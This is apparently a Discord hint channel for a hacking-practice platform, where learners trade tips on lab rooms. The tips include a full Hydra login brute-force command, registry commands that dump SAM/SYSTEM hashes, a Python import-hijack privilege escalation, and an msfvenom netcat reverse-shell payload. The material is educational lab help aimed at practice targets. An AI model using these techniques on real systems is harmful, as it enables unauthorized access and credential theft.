#room-hints

Look at the weight of the shell, before you start looking for it. and also try to fuzz for example in common directories, / uploads, / images, / content, even though gobuster does not return them to you

hey, i need a little help for OWASP juice shop room

help w/ wot

i'm using burpsuit

and in second last question i have to edit a custome header but in burp i cant find any option for that

please help

@white salmon ?

what part of it

like task

Perform a persistent XSS! this one

so you cant find the true-client-ip header with ur request?

you've went to last login ip and than caught the logout request with burp?

i'm not able to find 'header' tab so how can i add a new header value

@white salmon

ok lemme c something rl quick

ok

sec im updating ubrp

burp

ok

you have inspector w/ ur burp ?

think thats where u can add a new header value

where i can find inspector option

under site map

ok let me see thank you

but shouldnt you just be able to intercept the request and change it in the intercept window

but nah u can see inspector in intercept window to

its on the right side

u can add to the request headers from here

ok thanks for the help

np

Hello I'm having some problems with crack the hash room.

Part2 4: hashcat.exe -m 1800 $6$rounds=5$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02. rockyou.txt

But the result is exhausted :/

I think that's invalid format. I think you need to pass in a flag for the wordlist (-w maybe? Not sure). but also, the $ in the hash is probably breaking things- it's trying to insert variables when it sees that.

Either wrap them in quotes (" $hash stuff "), or put it into a file and pass that file in to hashcat

what is .rockyou.txt in the end?

i think its the wrong combination

that's the wordlist to try to use to crack it, but I'm pretty sure it requires an extra flag first

yes.

-w /usr/share/wordlists/rockyou.txt

Ok I'll save the hach in a text file

https://imgur.com/a/LJyzgMV

can you send it like screenshot because imgur is blocked in my country

yo rz

do

!docs verify

that

!docs verify

no press the link

click the link in embed

click on the link and follow the instruction

Done

hashcat.exe -m 1800 hashhash.txt -w rockyou.txt

And hashash.txt is

does it not say answer above that

is rockyou.txt in your current directory

yes

The room said to use rockyout.txt

i usually use it from /usr/share/wordlists/rockyou.txt

Yeah, i'm using hashcat on windows, so I have it in the same folder as hashcat.exe

hmm

just use $6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.

as the hash

Ok, I'll try that. I was using rounds=5 because that number appeared in the room. Let's see if this works. Thanks

I guess that should work

so i am in room nmap from networks and i wanted to ask how do u check the dependencies of a script ?

open the script in a text editor

there will be a dependencies field

oh thanks

Gave +1 Rep to @slender dawn

@slender dawn so i did nano the file

and

"stdnse" local string = require "string" local table = require "table" local os
= require "os" a, will blank out their name (and only send their domain).local
datetime = require "datetime"
Other systems (like embedded printers) will simply leave out the infor
description = [[
Attempts to determine the operating system, computer name, domain, workgroup, and curr>
time over the SMB protocol (ports 445 or 139).
This is done by starting a session with the anonymous
account (or with a proper user account, if one is given; it likely doesn't make
a difference); in response to a session starting, the server will send back all this
information.

The following fields may be included in the output, depending on the  
circumstances (e.g. the workgroup name is mutually exclusive with domain and forest
names) and the information available:
* OS
* Computer name
* Domain name
* Forest name
* FQDN
* NetBIOS computer name
* NetBIOS domain name
* Workgroup
* System time

Some systems, like Samba, will blank out their name (and only send their domain).
Other systems (like embedded printers) will simply leave out the information. Other
systems will blank out various pieces (some will send back 0 for the current
time, for example).

If this script is used in conjunction with version detection it can augment the
standard nmap version detection information with data that this script has discovered.

Retrieving the name and operating system of a server is a vital step in targeting
an attack against it, and this script makes that retrieval easy. Additionally, if
a penetration tester is choosing between multiple targets, the time can help identify
servers that are being poorly maintained (for more information/random thoughts on
using the time, see http://www.skullsecurity.org/blog/?p=76.

i got this but i dont see the dependencies file

Dependencies are mentioned in the file, grep can be useful.

ya found it thanks

thanks

yeah just grep it

it is present like this

That seems like it's just spoiling the answer so I'm gonna delete that

hello guys

the upload vulenrabilities room target machine keeps bugging on me

for some reason i cant access the websites provided by the room

i pinged the machine ip and it was connected

i checked my openvpn and it connected

so i thought maybe my browser may be bugging

changed it but nothing happened

has anyone faced any kind of similar issue?

You can't access it by IP, please describe what you're doing and what's not working.

did u modify ur /etc/hosts file as indicated at the start of the room?

so the room acquires you to get flags,right. by bypassing uploads

i did the first flag on the first website given by the room

i solved it but it was super super slow

and the website kept lagging

on the other rooms tho

i cant even open em

Sounds like a VPN issue, or at least it usually is.

!vpnscript

i double checked it

everything is the way it should be

Please run the script

You need to be willing to troubleshoot and work with us, otherwise you don't stand a chance of getting it fixed.

i ran it

like i said

everything is in place

any other suggestions?

Guys how do u do a icmp ping scan

is it ping icmp ?

or i want to know using nmap

well, as this is hints channel

did you read the output of nmap -h?

no sorry thx,

and a ping, is an icmp request yes

https://en.wikipedia.org/wiki/Internet_Control_Message_Protocol

so how do i add spoiler thing

on discord

I don't think you'd be spoiling it for many people if you talk about this 🙂

https://support.discord.com/hc/en-us/articles/360022320632-Spoiler-Tags-

okay so i did nmap -sn and machine ip but my host is up

and the answer is coming no

|| test ||

ok yeah its || to do spoilers, type in the pipes

okay got it

ok what room are you doing

and what exactly is the question

| so i am doing nmap room and its practical section 1st question , which says does the machine target respond and when i do the nmap scan to check if it does its , it actually does but the answer is No|

what why dint it go inside a spoiler thing

did you use double pipes on both sides?

what task is this for?

yes

so nmap task 14 question 1

oh I see

so when you type "ping (hostip)

you get a response?

its host is up but answer was n

i used nmap -sn machine ip it responded

does it respond to ping however?

no it does not respond to ping

so whats the answer to the actual question

N

but this is a nmap section so isnt it that i have to use nmap commands to find the ans

well, if you note the next question it tells you exactly what to do right

the first question had (ping) in brackets

it didn't say "perform a ping scan" specifically

I can see why it might be a bit misleading however

ya i understood that i had to use ping i did that but since it was not from the same library i wanted to check it out from nmap

but okay fair enough

you can read further on what the nmap Ping Scan does but its not the same as a standard ping (ICPM Echo request)

cool thanks alot

Gave +1 Rep to @silver otter

Hello, I'm doing the HackPark room, and when I use Hydra, it ends up providing about 15 passwords that are found, but none of them work. Looking at some of the write ups I can see that I'm using the same syntax for hydra to get the cracked password, but it instantly gives me the 15 or so passwords each time now. Any ideas? Here is my hydra command

||hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.56.228 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=85ix11j%2BxrIRQvDXJxtbFlSllwg%2FCZVpgnJY789qA4Vnf7Ib7upzljVVyFeE5GmewVamjOy69epZ1GAii9ecq2P7iVSrbaASoDmBh71qza5%2FdvYyx7n784Co0ZlqPSajsFYBlo1ev8GP4ypj64IRHgxFo19Z0KLaH3M%2FtsHzncvFQa6IFkyM1ENQ3DDK38hmb%2Fi%2BMOwP5lcS%2BEc%2Fn9xPJi2Nb4Md3Fbxg53PY1K2EnX6JkfBQGCvgNsGv3vogXobbBYWRWLo0qCjxBVTmhXNX4gDsVsJxKWaGbEJfJrZS9h2eEo%2Fa0VHXhGkI9Q1zvGNPoYz01yRHL4fsEkCm%2FMvVWJ4yJn14pl%2FrOunbBKCHCcjOdBO&__EVENTVALIDATION=Y2aOZI3SznMjV2AV9APTR%2F4TK9WJxbF2x114jb7iaY8tDgDDAYNn1tIG%2BC1zLAYR4sJuoI3CYymYDO9PPXFyjMNlLElWWmvGuyBdbo0lQ7qY67iGahiUL%2BWiAzXe099KfdT%2FD78woJ8NoxnjWr6NKJXNWADf8b5BRjPaSb%2FC7Sa6pOyX&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Fail Login"||

it's really long to see properly, but are you sure the last part is right?

by last part i mean the error message you are giving hydra

ya error mesage is wrong

message

Yeah it's pretty much identical to the walk through. One thing I noticed though is that it seems like Hydra keeps a cache file of the overall process of the crack? I actually already cracked this in the afternoon. So is it skipping over the correctly answer because it's somewhere in the cached file? I'm trying to figure out how to see that file now.

i'm not sure, but i'm looking at the video that was made for this room, and the failed login message is different to what you have provided

Oh Login Failed instead of Fail Login?

YEP!

OOPS CAPS

oops

looooool

nice

Hmm I thought that could be any message, let me give that a shot

ya that'll work

nah so that last bit is looking for anything in the html that is unique when you provide wrong credentials

ohhhh ok that makes sense

And sure enough it's taking longer now that I've updated that. I'm guessing it'll find the right password now, thanks for the help!

no problem :)

and just to provide more insight into your previous command,the reason it was showing every password as correct is because "Fail Login" never appeared in any of the responses, so it assumed they were all valid

Ahh thanks for helping me connect the dots!

Gave +1 Rep to @digital iris

I am getting started with my first AD machine. Going after Attacktive Directory, but I am stuck on which tool to use for enumerating NetBIOS. Any ideas?

Figured it out because I was being dumb...lol😒

use mysql;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-A

use mysql' at line 1
mysql>
how can i solve this problem ?

Try it again. It was counting -A from a previous line as part of the command.

I've completed the Intro To Python room, but I don't understand the difference in the problem I had.
I completed the challenge by changing from a while loop to a for loop, but don't understand why the while loop affected it.

Different Implementations:

    DecodedStep = base64.b16decode(DecodedFlag)
    DecodedFlag = DecodedStep```
(Success)


```i = 0
while i < 5:
    DecodedStep = base64.b16decode(DecodedFlag)
    DecodedFlag = DecodedStep
    i+=1```
(Failed)

Error:
```Non-base16 digit found
  File "/home/coreyo/Downloads/pyproject/Intro to python.py", line 13, in <module>
    DecodedStep = base64.b16decode(DecodedFlag)```

i don't see that you're incrementing i during while. Means i will always be < 5

Ahh I had I forgot to add it back in

btw it's enough if you write range(5) instead of range(0,5)

it will always start with 0

Ahh nice, I was just following from documentation I read

problem solved well done

@tight fulcrum No you're right lol, maybe I had something else wrong when iterating while beforehand

Thanks mate!

Quick question: when I type in a shell for example bash or python, if the executable with the given name is present in the current directory, shouldn't it directly run it? (Without trying to find it in PATH).

I can directly tell it to look into current directory by appending ./, but shouldn't directly bash or python also try to lookup in current directory first, and then try to find an executable in PATH?

No

it'll look in the PATH only. ./ specifies the current directory

unlike Windows

Powershell won't look in the current dir either

point

CMD will

but noone should be using cmd

adventofcyber last day, question hint said root.txt was in /root but its not? is it possible someone could have deleted it?

You don't share machines with other people on THM, outside of Networks or koth.

hmm where could the root.txt be then possibly?

nvm its in /mnt

is there a way to set multiple options in msfconsole at the same time? for example, say I want to set lhost = tun0 and lport = 4445. i'm trying to do something like set lhost tun0; set lport 4445, but then that just ends up setting lhost to tun0 set lport 4445, just wondering if I can set multiple at once to save time

I'm not sure. But you can globally set options, lhost is a good one for that

in Year of the Fox ||the passwords are dynamic||, aren't they?

yes

that's not fair u.u

go yell at @inland onyx then, he feeds off the tears of the suffering

haha well said

I've been stuck on the eternal blue attack! I literally cannot get a meterpreter session started for the life of me, im specifically at the "sometimes it works sometimes it doesnt " part arggg heres a screenshot thanks in advance

i have transfered the sam and system files from windows to linux( i m doing blueprint room)

how can i get their hashes now

i tried samdump2 but i m getting segmentation fault

crackmapexec is also not working

I think secretsdump.py

from impacket

oh ok

thanks man

i will try it

np, it should be in kali by default

locate secretsdump.py

getting an error

i have both sam and system in this folder

Is this for Wreath?

no i m doing blueprint room

Ah, wreath has a nice section on it

no i mean i tried to use mimikatz on blueprint

but couldnt find a x86 mimikatz

i m not using metasploit

reg save hklm\sam c:\sam
reg save hklm\system c:\system

and that's how i dumped them

and then transfered both sam and system to kali

and then tried samdump2 but it is not working

i m getting segmentation fault

try putting LOCAL at the end of the secretds dump command

its after a "target" as it says

hello so i am doing "network services " room and i am stuck at task 4 3rd question does the share allow anonymous access what am i suppose to connect to ? and the attack box has no secreat file

anyone please

You need to deploy the correct target machine

Ya so i did deploy the target machine but what is the file ?

What file?

smbclient//ip//share

the share ?what is that

You are missing a space there

The room tells you what you can use to list shares.

oh okay

let me try ,thanks

hey so i am doning is smbclient//ipofthemachine//profiles -U Anonymous -p 80 is anything wrong

?

Yes

You are missing a space.

If it's not working, clearly something is wrong.

I don't know why you're specifying port 80 either, there's no reason to do that

spaces where ?

smbclient is the command.

//ip/share is the first argument to that command.

because last question asked to input default port

So where the heck did you get 80 from?

so will it be smbclient //ip/share?

That's part of it

isnt 80 the default port

No

80 is the default port for HTTP.

You're not doing HTTP

You also do not need to specify the port if it is the default

ya got it

thanks alot my 80 port was the issue

Gave +1 Rep to @stuck fractal

thanks alot

It was more than that

yep and its asking for a password was it meant to?

Screenshots

ya one sec

If you want help, we need to know what you're doing and what you're seeing

ya no issue

here

Press enter

okay

connection discounted

Screenshot

@stuck fractal

I'm a bit confused on the last question for task 8 in the SQLi-Labs room. I've entered in every flag listed in the table, followed the same format for the 1st question in that section, but I am still a bit stumped

Regarding how to list all databases on the website listed in the previous question

got it , it was space and enter

Shouldn't be

It will be the fact you retried

i dint get u ?

You shouldn't need to enter a space

It will just be because you tried again

see

oh okay

I'm not arguing with the fact it worked

I'm saying that was not the password, there was no password

oh okay, thanks alot for the help.

Gave +1 Rep to @stuck fractal

Nevermind on this, the answer wasn't in the table that was referenced in the question

still a great room though!

hey guys , how do i enter the profile ? i am doing cd but doesn't work

That is not a directory, it is a file

It is also not the file you're interested in

but the question does ask me whoes profile is there

Is smb commands different compare to linux

Yes

Feel free to ignore my advice, but I've completed the room 3+ times

no no i dint mean to sorry

I recommend googling "How to use smbclient"

thanks alot found my answer , i never knew smb had a different command

Gave +1 Rep to @stuck fractal

hey so i need small help with task 4 from "network service" stuck in the last problem , i download the id_rsa onto my local host and when i ssh "first question the ip address is machine address rite ?" second what am i suppose to do i did ssh to cactus@machine ip it ask for a password

you need to do "-i id_rsa" in the command to use the cert

whats that basically ? if u dont midn

it tells ssh to reference the id_rsa key for login, otherwise you would be requested for user login

oh okay

but isnt it encrypted ?

Not neccesarily

okay

thanks

Gave +1 Rep to @glacial gust

np

how do u know if u have to use this command ?

It's a key, not a cert

Seems pedantic but it's important to be when you're doing crypto

you can only use if you have an rsa key for the user

soo ssh usernam@ip -i id_key rite ?

yup

oh nice is it alright to ask like this and solve ?

so its a encrypted key rite ?

If it asks you for a passphrase then yes

This key is not encrypted

It's a cryptographic key, but it's not encrypted

oh okay

i am getting this anyclue

What does it say?

In very very big letters?

unprotected private key

Did you google the error?

no i will do it now

Please do that before asking here

okay sorry

thanks got it

Done thanks alot

Gave +1 Rep to @stuck fractal

thanks you too

no support channel for the latest room ?

doesn't look created yet, strangely enough it doesn't even show up in my "new rooms" feed

strange. It was shown here in anouncement

but it does seem like it is related to some udemy training so might be the reason

It’s been out for a bit but it’s dedicated to nahams udemy course

Yea, naham has a support channel for it in his discord

ok thats why

is it ok to try to room or?

Yea but it might be hard to follow if you don’t have the course and the course is a bit costly but makes sense why it’s that price

interesting.

@steady elm is it nahamsec intro to bughunting?

I have free udemy accees so I might as well join that course 🙂

"test" already existed when i started this machine and im not getting the same output when following along with the video... what am i doing wrong

Please show us what you're doing and what you are getting then, if it's not the same as the video

first thing i did was ls, test is already there, you can also see where i attempted to mkdir test anyway

Where's the problem?

that i cant mkdir.

it already exists

The directory already exists, that's fine

It's a bug with the room, but it does not stop you from continuing

You're getting exactly the same thing as the video.

ok, so just step over mkdir test and proceed?

where did we learn this, or am i supposed to have figured all this out myself?

You were taught the find command

You can also google for "Linux hide errors from command"

??

Yeah

That last bit is hiding errors

i understand whats going on up to that point, i guess i dont know how i was supposed to know to google "hide errors" in the first place

i feel like some supplementation is required

Correct, with your own research

i guess i dont know how i was supposed to know to google "hide errors" in the first place Because you get a whole bunch of errors without

i just know how im supposed to have known that was even a thing to be researched...

You got spammed with errors

but noting ive been taught so far would have lead me to believe thats a thing i could have mitigated.. like everything else has been intuitive up to this point

its not like weve really been taught how to interpret the output

everything is google-able :). If you ever encounter a situation where your instincts tell you "huh, that's weird", or "I'm lost", that's a good candidate for google/other research

or also "there's gotta be an easier/better way to do this"

idk i feel ill prepared... like here is a few commands, no understanding of the output and im just supposed to know what to even google

there are also the man pages- always a great resource

definitely, as a complete beginner, it can be hard asking a "good" or "intelligent" question, but there's also documentation to read, which usually provides a lot of extra context

i man everything, the out put doesnt even say "error" otherwise id have googled the error code it says permission denied..

i feel like im getting through this without really understanding all of it and just getting deeper and deeper.

what should i have googled to understand what im doing? like i dont even know that at this point.

well, in the case of the 2>/dev/null thing, if your thought is "I have no idea what that means", just google the entire thing, and see what pops up. That will often give you enough information to ask further questions

In my case, when I google that, the first result is: https://askubuntu.com/questions/350208/what-does-2-dev-null-mean

that explains what 1, 2, and /dev/null are, as well as >

ok, i can absolutely do that now, but had i not watched the video i would not have even seen that to be googled.. you see what i mean? i dont want to "cheat" i want to do the work and understand it i just dont see how i could have arrived at this point on my own

I wouldn't think of it as cheating, as long as you are learning. Think of it like peeling back an onion- as you learn more, you can go a little bit deeper. It takes time. A lot of time. It's not easy, it takes a lot of determination, trial&error, and figuring things out

I can't tell you how many times I wasted hours going down a rabbit hole and the solution was something stupidly simple, had I just known. But the key there is: LEARN from those experiences. You struggle, you learn something new. Make a note of it, and next time, that piece will be easier, and you'll instead struggle with something entirely different.

dont get me wrong, im definitely learning and i dont view it as actually cheating. Just lacked better phrasing. I just feel like i should be able to arrive at the solution with the things i have been taught without having to watch the video and i dont see how i could have done that.

walkthrough rooms are meant to be instructional, but they can't/don't teach you EVERYTHING. Some of it is because the room creators want you to go research on your own, some of it is because the room might be outdated, some of it is because the creators might assume you know more than you do

the biggest/most important skill you can develop is researching and figuring stuff out. Sometimes that's a lot of googling, sometimes it's just trial and error. Kinda depends.

but ultimately, everything starts with a question, an "I don't know" moment. Then you have to figure out how to gain some new knowledge that helps you solve the problem

Don't get discouraged :).

... alright, im gonna get back in there. i appreciate your help

🙂

another approach- sometimes it helps to take a break. And list "here are the resources I have/things I know" as well as "here is what I am trying to achieve". In a lot of these simple rooms, it'll be something like "I know ssh is enabled, and I have a username" and "I don't have a password, but I want to log in with ssh"

and when you identify that gap, then you have something to work on. Maybe there's a tool that does that. Then you have to go learn a new tool. Stuff like that.

I'll try to keep that in mind, thanks again 🙂

Gave +1 Rep to @worn otter

@dry briar here's a good website which explains commands https://explainshell.com/

just type in your commands and it will tell you what each parameter does

You're welcome 🙂

Did you ever find the solution ?

No, I just grabbed the flag from a blog

I think i understand this method and technique already much so, can you DM link to blog please ? 😦

Just go to one of the write ups of this room and you'll find it

Which blog did you read ? I didn't see any writeups

Are you guys stuck on the first entry in task 7 or the second?

Second
Question #2

@white salmon you should get the xss flag after you logout

https://discordapp.com/channels/521382216299839518/522158539129618453/835196647989968906

Google?

nevermind... was just mounting error. Worked fine with remounting. Thanks

That's what i'm expecting but I see no flag

after u logout?

yessir

All i see is the pop up alert xss box

no flag

the xss should pop up when u login

after you logout the flag should be there ig

Are you referring to Task 7 question #2 in the Juice Shop Room?

yea click on that link

this one

u can see i am logged out

yeah not sure why it's not doing the same on my end

hmm ig there is a problem

cuz someone was saying the same when i posted that ss as well

EmptyBuffer
—
Today at 7:19 PM
that's not the flag that I have in my notes
so either it's changed/dynamic, or you got the flag for doing something else
In my notes, that's the flag for error handling not done gracefully
so- congrats on causing an error in the backend 🙂
the flag I got for that question started with a 23 and ended with a a0
Good luck with it :). I'm afk for a while

That's what EmptyBuffer said earlier

Same thing is happening for question #3 Task 7 in Juice Shop...

in Year of the Fox ||the priveleges scaling goes on the side of the PATH environment variable||, isn't it? ||the output of sudo -l is different in my system||...

Hi, I am doing the JuiceShop, par three, "question" 2 is really a statement, I don't understand what I suppose to submit

"Question #2: Log into the Bender account!"

Ach, those are all suppose to be flags... 😄

ThankYou NeuroScientician

np 😄

It's not necessary to be sarcastic, here we are all volunteers, if nobody answered your question it is because probably nobody has read it or we did not make the room you are making

It's just fun, no worries 😄

But to be honest, someone could edit the room and add some more specific questions.

they're more tasks than questions, and the Juice Shop will give you flags as you complete them

a question might throw people off more, as they're more likely to answer the question rather than input the flag

Pls i need hint in the room OhSINT

I've managed to figure all the tasks out apart from the last, password part

I'm really unsure how I'd get the password?

to get the answer, back to the source you must go..

look for a "pennY" in the blog?

Thank you both, I'm pretty sure I can find it now with some looking

bet you will

👍

Hey I was doing room wonderland... I got the ssh shell, any hints how to escalate from alice to rabbit? It doesn't seem that I can manipulate PYTHONPATH, or anything else with that python file given... (just using random module)

Ps: Try to give least hint possible 😅 I liked the theme of this box ❤️ and want to pull it off myself

Look at how imports work, by default.

You can't edit the script itself, but you can do something similar to what you're thinking about

Hmm alright, thx ✌️ lemme see it

Ok, I get it, ||I have to create a custom random module in my home directory (but I wonder if the rabbit's path is going to random in my directory 🤔 ||

Moreover, here's my code I did provide executable permissions to custom random file I created with nano in my alice's home directory... And here's the code... Can anybody plzz guide me what's wrong in this 😅 It doesn't seem to work

import os

class Random(random.Random):
        def choice(self,seq):
                os.system('sleep 5')
                return 1

Their PATH doesn't matter, it's in the cwd which doesn't change

No class required, importing random.random means the function random from the module random

When you import a module, it'll run all the top level code as soon as it's imported

It'll then allow you to call functions defined in the module, with the module as the prefix if you don't import a specific function

ohh I see... Let me try a simple code then...

Hah, it did execute... right there, first line of output... Lovely ❤️

Yep, and you can define choice if you want it to error out less

thx so much ❣️

Yeaa... Infact...

This, now makes sense

Hope you enjoy the rest of the box!

Sure, will let know when rooted 😃

hahaha, this room had me solving Bof for the teaparty binary 😂 well designed @stuck fractal (This was cruel 😈 )

I have a way I could have made it crueller

I chose not to

well glad you didn't... I suck at bofs

but now at hatter

nice one 👍

so where should I aim for next? tryhackme user or root?

Just confused now... Coz there's nothing more I could find with enumeration?

tryhackme is the user I used to create the box

You should not be able to get that user until you get root

You've seen it previously, you just couldn't use it

Assuming you ran linpeas

hmm, doesn't ring any bellls... May be I should try to re-look the path I came? N yes, I ran linpeas, It showed a localservice running on 53 (assuming dns) but not much idea (should I head that way?)

Linpeas will highlight something in big red angry letters

umm is it a mount point?

I found one here

No

It is something reasonably basic, but you couldn't exploit it until you got to this user

ohh, I see... lemme look through the output once again

ok I don't know what this means, but I did found perl with in a group of hatter (and that's not default 😏 )

does that mean something? coz it's not an suid either and no write permissions 🤔

Is it not?

Check again 😉

I am sure about not having the suid/sgid permissions

I'm not sure you are looking for that with the right command

Ohh I am actually a little confused... What is the difference between normal SETUID and a CAP_SETUID.

I did found these with linpeas (ran again)

Capabilities are an alternative to SUID

They provide much more granular control over what a program can do

Like you can add cap net bind to a process to allow it to bind to ports under 1024 without running as root.
The idea is to have less code running as root and to not grant more privileges than a program needs

Least priv model

Ohhh, I didn't knew bout this... So we can allot suid permissions to an elf without giving u+s. It's actually... Impressive 🔥

Well designed sirr

Yeah, SUID permissions (+s) work in a very similar way as cap setuid

Capabilities are spicy

And I copied that long command from gtfo... But this was srsly such a nice box ❤️

thanks for helping @stuck fractal you got any other recommendations? Like this box?

Gave +1 Rep to @stuck fractal

Looking Glass is the direct sequel

I have a 3rd instalment partly planned out that's a good step up in difficulty

Ahh, I love sequels... ❤️

hello I'm a new user on tryhackme, I'm stuck at a question

We're going to generate a reverse shell payload using msfvenom.This will generate and encode a netcat reverse shell for us. Here's our syntax:

"msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R"

-p = payload
lhost = our local host IP address (this is your machine's IP address)
lport = the port to listen on (this is the port on your machine)
R = export the payload in raw format

What word does the generated payload start with?

I had an error

"Error: One or more options failed to validate: LPORT."

can someone help me ? plz I'm a beginner 🥲

This [local tun0 ip] is not a thing in actual, it's a reference that you should input the tun0 ip here.

You can find your ip using ifconfig tun0 or ip addr s tun0 once you get that ip... input it in place of lhost

it also shows on the THM access page, or on the header of the room page you are on

Ok thank you I see

Gave +1 Rep to @solemn onyx

L

Hello, I'm doing Year of the rabbit, anyone can give me hints? I'm having problems with privesc

What have you tried so far?

I know i can change between users. But I cant find what to do after that.

No cron jobs or processes that I thin I can use

I think maybe Im complicating things haha

Did you try any Priv. Esc. Script? @dreamy skiff

I used lse and LinEnum. Maybe im not reading them thoroughly.

I was reading about Capabilities now.

Take a close look at ||sudo version||

I tried a bit of that, after looking at the version. But got some errors. Maybe I misstyped.

I'll investigate more

thanks

Search that version and read the articles carefully!

Guys what does this question mean ? From task 3 and question 3 from network service 2 now . Use /use/sbin/showmount ....... please let me know thanks I searched Google haven't gotten any hint

By using showmount binary, you can list the NFS shares.

I'm trying to submit a zero-star review in the OWASP Juice shop and I have no idea how to do that. Can someone give me a starting point?

So it should be showmount /use/share /showmount -e IP?

There are tons of articles about that. Search it up on Google. 🙂

No, showmount is a binary. Just like nmap. Therefore you can use showmount -e.

With /usr/share/showmount, you are actually executing the binary from it's location.

Oh got it

Okay got it got it thanks

Welcome! 🙂

But it says export list for IP
/Home *

What does that mean

* means everyone can mount that share. If in place of * there would be an IP, then that means only that IP Address can mount the /home share.

Okay thanks alot

Gave +1 Rep to @halcyon sequoia

Your very welcome!

@white salmon hey so I reached till question 6" interesting let's do it " so it says I have to look into the folder

And when I look into the folder nothing is there

I did list all its total 0

What was the command you used to mount? Did it give any error?
Share screenshots.

No it dint give any error infact I got the name of the folder

Ya one sec

Here is the image

That's weird.

Try resetting the box, maybe.

Okay cool

One more thing nmap is too slow anything fast ?

Rustscan

It does the same thing ?

Yep.

Scans 65535 ports in less than a minute I guess.

@bold lichen https://github.com/RustScan/RustScan

Facing the same issue

i am solving room battery.https://tryhackme.com/room/battery

found an admin login panel looged in with defualt creds ||admin:pass||.Still cant execute commands it says only admin can execute commands.Also tried by disabling javascript but still no good.Any hints would be highly appreciated!Thanks in advance😊

@true widget Did you try gobuster on port 80?

Can someone give me a hint for the archangel room.... I know there is directory named as ||flag|| but the page there but it redirects to youtube... tried to intercept the redirection with burpsuite but no help

Disable something that start with J...

@white salmon yes i did that how I got to that banking application.I also got a binary too but can't figure it out

@true widget Try ||RE on binary?||

Room: Blog (wordpress 5.0 exploit executed successfully but the PoC link generated is not giving command execution)

Any hints what can I be doing wrong? I got the username and the password... The image I uploaded is also opening in the page source (gibberish) just not executing commands

@white salmon i tried with ghidra.But being honest I am a beginner in re stuff.But I ll give one more try🤘

@true widget You will get it, it's easy.

It's not the name of the person

Room: VulnNet: Internal... I got the first flag(service-flag) but im stuck at the internal flag. i just cant find any ressoures on the services that i can access without credentials (except the one where I got the service flag) does anyone have a hint ? 😅

hey i need some help

with task 7

sorry wrong image

this is the imag

so i got the username and stuff and i applied it to hdyra and tired to run as mentioned in the task to do but it keeps saying it cant connect to the network

@white salmon

what happens if you just type ssh administrator@ipaddress ?

you didn't say what room this is

network service 2

it sounds like ssh might not be on default port or you can't talk to the target

yep its on 25 port

25?

i guess since its a smtp room

thats not default ssh so I doubt hyrda knows

okay let me change and see

same issue i changed the port to 25 nothing happened

screenshot

yep

and try not blur the syntax of the command with scribbles lol

i am blurring the ip

is that okay ?

ip is fine as long as you get it correct, it seems to respond

what happens when you just try to ssh without hydra

(on port 25)

let me try but since the room said to do with hydra my initial was hydr

yeah but now you need to troubleshoot your connectivity to ensure its working ok

it says could not connect no port 25 exist

it doesn't look like it shoudl be port 25

(just opened the room)

Is the IP of machine correct? Also, are you sure that the SSH port is 25? @bold lichen

yep cause its a smtp server so it should be 25

just because it is running an smtp server

Hello 👋 - For VulnNet: Internal, does anyone have a nudge/hint for the user flag? Trying to get RCE but ran out of ideas

doesn't mean it can't run ssh on another port

okay

its like 22, the given command is default

try ssh without port specified

okay

says no route found

Hey, are you sure the IP of the machine is correct?

yep i doubled cross checked it

i can share a picture with the ip

can you screenshot the ip and the one you are typing

its only a target machine

okay no issue

its not like someone will steal your chance to hack it

If IP is correct, then maybe try resetting the box. Just in case.

and ensure you are on the VPN

Where are you at?

using attack box

I guess, he is using attackbox

yep

oh I see

one is with hydra and other is with ssh

ip of the machine is 10.10.110.116

ok but a screenshot of the box's IP

mmm

that says

166

166

not 116

.>

shit

omg

hah hah

easy mistake to make

so sorry

to both of u

i am so sorry

No worries, things like this happen.

all g

so sorry guys i am really sorry

Uhuh, It's alright!

well, put it this way, I bet you won't make that mistake again in a hurry

thanks @white salmon and @silver otter

Gave +1 Rep to @halcyon sequoia

Now, tell us if it's working.

ye one sec

now my attack box has hanged

Alas!

So did my brain. AFK.

gonna use local skali

kali

by the way i check man and tried to understand hydra task what it does ? is it like multithreading

-t is threads I think yes

so like multithreading rite sending request at each time multiple

yeah, something like that

getting the same issue

are you connected to the VPN?

yep

can you try ssh

okay

if that doesn't work either ensure you can browse to 10.10.10.10

my browser is connecting to 10.10.10.10

but ssh is not

kind of strange

yep even attack the box is lagging for me which never happens

and this isnt connection

connecting

is the attack box running?

the hydra command?

(it can use a lot of resources)

now atb is running

it runs the command but doesn't connect to the ssh

should i restart the server ?

yeah probably

cool

it is quite strange

when the box is back up (after waiting 5 - 7 mins cos its windows afaik?)

try ssh first

now its working

hydra is not refusing and it has started a brute forcw

force

haha ok wow

interesting

well, I don't know what the problem was but good work

yea , can someone already take the access and change something is that possible

thank you

Gave +1 Rep to @silver otter

it might be if it was one of the cool kids like CMNatic but I don't think so typically

mmaybe haha , but tryhackme so much fun dude in the previous task like nfs and all i did take a small help in smtp i never did meta spoilt and my god i google stuff how to use metaspoilt and stuff man this has been so good

hahah, yeah it's a great platform for learning no doubt!

I kind of somewhat wish it wasn't called tryhackme because it kind of lends itself to sounding less professional than it is

its perfect i am enjoying it alot and i feel this is a great field

i ignored it for so long but now i am so happy i did it again

you'll never have to resort to being a killerthief again!

haha true

back to thm have to finish this beautiful room

Hello,
If there is anyone, who can give me a hint with Network service 2- task 4" exploring NFS"? Please send me a message.
When running the script './bash -p' , i am expecting my privilege to escalate to " root". Unfortunately, i am still a normal user. The permission for bash file is "rwsr-sr-x". As shown below: cappucino@polonfs:~$ whoami
cappucino
cappucino@polonfs:~$ ./bash -p
cappucino@polonfs:~$ whoami
cappucino
cappucino@polonfs:~$ id
uid=1000(cappucino) gid=1000(cappucino) groups=1000(cappucino),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
cappucino@polonfs:~$ ls
bash
cappucino@polonfs:~$ ls -al
total 1124
